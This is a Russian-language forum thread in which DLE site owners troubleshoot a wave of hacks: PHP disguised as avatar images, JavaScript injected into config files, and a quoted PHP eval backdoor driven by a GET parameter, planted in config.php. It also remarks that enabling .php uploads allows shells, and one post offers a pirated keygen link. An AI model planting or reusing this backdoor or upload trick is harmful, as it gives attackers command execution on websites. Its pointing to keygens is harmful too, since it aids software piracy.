Информация Массовый взлом сайтов на DLE

[BKK]

Это пи**ец какойто, девка с помощью програмки ложит сайты (хз может best-hoster или версия дле9 виновны) в итоге на странице

Эта программа называется ДДОСИМ КЛИЕНТОВ ***но ХОСТИНГА

 

[d-man]

я кстати просто сделал восстановление сайта за предыдуший день и поставил бэк-фиксы - вроде нормально сейчас. А если прикинуть под админскими правами какие пакости скрытые можно сделать? про удаление и прочие не говорим, только скрытые подлянки.

 

[BKK]

можно дефейснуть сайт, можно слить базу, можно шелл залить, можно уничтожить сайт, можно трафик слить
Список подлянок очень велик и разнообразен! все зависит от вашего воображения)

 

[d-man]

я в папке upload/fotos, где аваты юзеров нашел файл foto_33333.glf подозрительно малого размера, глянул в текстовом редакторе его код а там пхп код:

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

Где еще можно подобное поискать.

Кстати, после этого взлома юзера из группы "журналисты" которые добавляли варез на сайт в автоматическом режиме (с помощью спец. программ) больше не могут этого делать - я проверил права группы - все ништяк - где может быть загвозтка?

 

[barabula]

я в папке upload/fotos, где аваты юзеров нашел файл foto_33333.glf подозрительно малого размера, глянул в текстовом редакторе его код а там пхп код:
А как

А как тебе умудрились залить файл с разрешением glf в фотографии? в DLE же стоят фильтры котоыре пропускают только определённые файлы.

 

[help40]

это что нашли файл gif с PHP код внутри не так опасно ,
они надеются что найдут "inclusion" уязвимост ....
так что если такая уязвимост нет , то пускай ставят себе такие аватартки сколько хотят

 

[d-man]

А как тебе умудрились залить файл с разрешением glf в фотографии? в DLE же стоят фильтры котоыре пропускают только определённые файлы.

этоже папка под аватар - туда можно по умолчанию гифы лить.

 

[joni666]

Беда с этим Dle ..
я вообще часть функционала в php.ini отрубил ..замучился каждый день видеть новые подписи в Индексе ..
Ся софт для взлома дле каздому Школьнику доступен...

Добавлено через 1 минуту

ставьте лицуху а кейген есть в сети, зачем вам нуллы с шелами ? зачем себе мозги засорять всякой ерундой по поводу "нулл с шелами наверное?"
видел много таких комментов с релизами дле на различных сайтах
если кому нужна ссыль на кейген то пишите в ЛС. а так я думаю гуглом многие умеют пользоваться

=) Нулы не всегда с шелами. а вот по безопсности разницы нет. =) у мя лиц . но взломы не закончелись.

 

[BLACK ANGEL VAMPIRO]

У меня такая же самая беда.
Вот что ещё надо проверить:
файл dbconfig.php и config.php в папке /engine/data/
В файл dbconfig.php прописывается жаваскрипт с партнёркой. А в файл config.php дописывается код:

'lang_123' => "{${@eval($_GET[cmd])}}",

Скорей всего что используется недавно обнаруженная уязвимость на недостаточную обработку данных. Об этом можно прочитать и на офф. сайте DLE и здесь у нас на форуме тоже Для просмотра ссылки Войди или Зарегистрируйся.
Очень удобно, имея на руках базу DLEшных сайтов для постинга новостей, пройтись по ней с целью использования уязвимости. Есть кстати версия, что это разработчики DLE решили использовать уязвимость для поднятия уровня продаж своего софта.

Я сомневаюсь, что это разрабы так как такая уязвимость скорее поспособствует пользователям засомневаться в использовании ДЛЕ и перейти на другой движок многие мои знакомые узнавшие об этой уязвимости просили проверить меня их сайт и посоветовать им другую цмс. Так что разрабам если это они это огромный минус и потери прибыли

Добавлено через 11 минут

этоже папка под аватар - туда можно по умолчанию гифы лить.

если ты не заметил то разрешение не гиф а глф смотри внимательно glf это не gif

 

[BKK]

Вот кстати если вносят изменения в /engine/data/dbconfig.php и /engine/data/config.php имеет ли смысл после того как настроите сайт по FTP поставить chmod 555? Как думаете? В эти же файлы пишут всякие гадости + в config.php прописываются - 'files_type' => "zip,rar,exe,doc,pdf,swf", и если через админку добавить разрешение на .php то можно со спокойной душей грузить шеллы

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.